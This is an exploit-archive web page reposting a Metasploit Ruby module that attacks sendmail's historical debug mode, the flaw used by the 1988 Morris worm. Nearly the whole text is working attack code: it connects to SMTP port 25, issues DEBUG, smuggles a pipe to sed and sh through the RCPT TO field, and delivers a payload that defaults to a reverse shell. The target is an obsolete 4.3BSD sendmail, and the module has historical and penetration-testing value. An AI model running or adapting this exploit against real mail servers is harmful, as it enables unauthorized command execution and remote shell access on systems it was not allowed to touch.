首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Morris Worm sendmail Debug Mode Shell Escape
来源:metasploit.com 作者:wvu 发布时间:2018-11-06  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'expect'

class MetasploitModule < Msf::Exploit::Remote

  # cmd/unix/reverse spams the session with Telnet codes on EOF
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Morris Worm sendmail Debug Mode Shell Escape',
      'Description'    => %q{
        This module exploits sendmail's well-known historical debug mode to
        escape to a shell and execute commands in the SMTP RCPT TO command.

        This vulnerability was exploited by the Morris worm in 1988-11-02.
        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.

        Currently only cmd/unix/reverse and cmd/unix/generic are supported.
      },
      'Author'         => [
        'Robert Tappan Morris', # Exploit and worm for sure
        'Cliff Stoll',          # The Cuckoo's Egg inspiration
        'wvu'                   # Module and additional research
      ],
      'References'     => [
        ['URL', 'https://en.wikipedia.org/wiki/Morris_worm'],         # History
        ['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'],  # Analysis
        ['URL', 'https://github.com/arialdomartini/morris-worm'],     # Source
        ['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup
      ],
      'DisclosureDate' => 'Nov 2 1988',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Privileged'     => false, # DefUid in src/conf.c, usually "daemon"
      'Payload'        => {'Compat' => {'RequiredCmd' => 'generic telnet'}},
      'Targets'        => [
        # https://en.wikipedia.org/wiki/Source_Code_Control_System
        ['@(#)version.c       5.51 (Berkeley) 5/2/86', {}]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'}
    ))

    register_options([Opt::RPORT(25)])

    register_advanced_options([
      OptFloat.new('SendExpectTimeout', [true, 'Timeout per send/expect', 3.5])
    ])
  end

  def check
    checkcode = CheckCode::Safe

    connect
    res = sock.get_once

    return CheckCode::Unknown unless res

    if res =~ /^220.*Sendmail/
      checkcode = CheckCode::Detected
    end

    sock.put("DEBUG\r\n")
    res = sock.get_once

    return checkcode unless res

    if res.start_with?('200 Debug set')
      checkcode = CheckCode::Appears
    end

    checkcode
  rescue Rex::ConnectionError => e
    vprint_error(e.message)
    CheckCode::Unknown
  ensure
    disconnect
  end

  def exploit
    # We don't care who the user is, so randomize it
    from = rand_text_alphanumeric(8..42)

    # Strip mail header with sed(1), pass to sh(1), and ensure a clean exit
    to = %("| sed '1,/^$/d' | sh; exit 0")

    # We don't have $PATH, so set one
    path = '/bin:/usr/bin:/usr/ucb:/etc'

    sploit = {
      nil                   => /220.*Sendmail/,
      'DEBUG'               => /200 Debug set/,
      "MAIL FROM:<#{from}>" => /250.*Sender ok/,
      "RCPT TO:<#{to}>"     => /250.*Recipient ok/,
      'DATA'                => /354 Enter mail/,
      # Indent PATH= so it's not interpreted as part of the mail header
      " PATH=#{path}"       => nil,
      'export PATH'         => nil,
      payload.encoded       => nil,
      '.'                   => /250 Ok/,
      'QUIT'                => /221.*closing connection/
    }

    print_status('Connecting to sendmail')
    connect

    print_status('Enabling debug mode and sending exploit')
    sploit.each do |line, pattern|
      Timeout.timeout(datastore['SendExpectTimeout']) do
        if line
          print_status("Sending: #{line}")
          sock.put("#{line}\r\n")
        end
        if pattern
          vprint_status("Expecting: #{pattern.inspect}")
          sock.expect(pattern) do |pat|
            return unless pat
            vprint_good("Received: #{pat.first}")
          end
        end
      end
    end
  rescue Rex::ConnectionError => e
    fail_with(Failure::Unreachable, e.message)
  rescue Timeout::Error
    fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
  ensure
    disconnect
  end

  def on_new_session(session)
    print_warning("Do NOT type `exit', or else you may lose further shells!")
    print_warning('Hit ^C to abort the session instead, please and thank you')
  end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·blueimp jQuery Arbitrary File
·Blue Server 1.1 Denial Of Serv
·Morris Worm fingerd Stack Buff
·Dell OpenManage Network Manage
·PCManFTPD 2.0.7 Server APPE Co
·CMS Made Simple 2.2.7 - Remote
·LiquidVPN 1.36 / 1.37 - Privil
·Arm Whois 3.11 - Buffer Overfl
·Softros LAN Messenger 9.2 - De
·eToolz 3.4.8.0 - Denial of Ser
·PHP Proxy 3.0.3 - Local File I
·libiec61850 1.3 - Stack Based
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved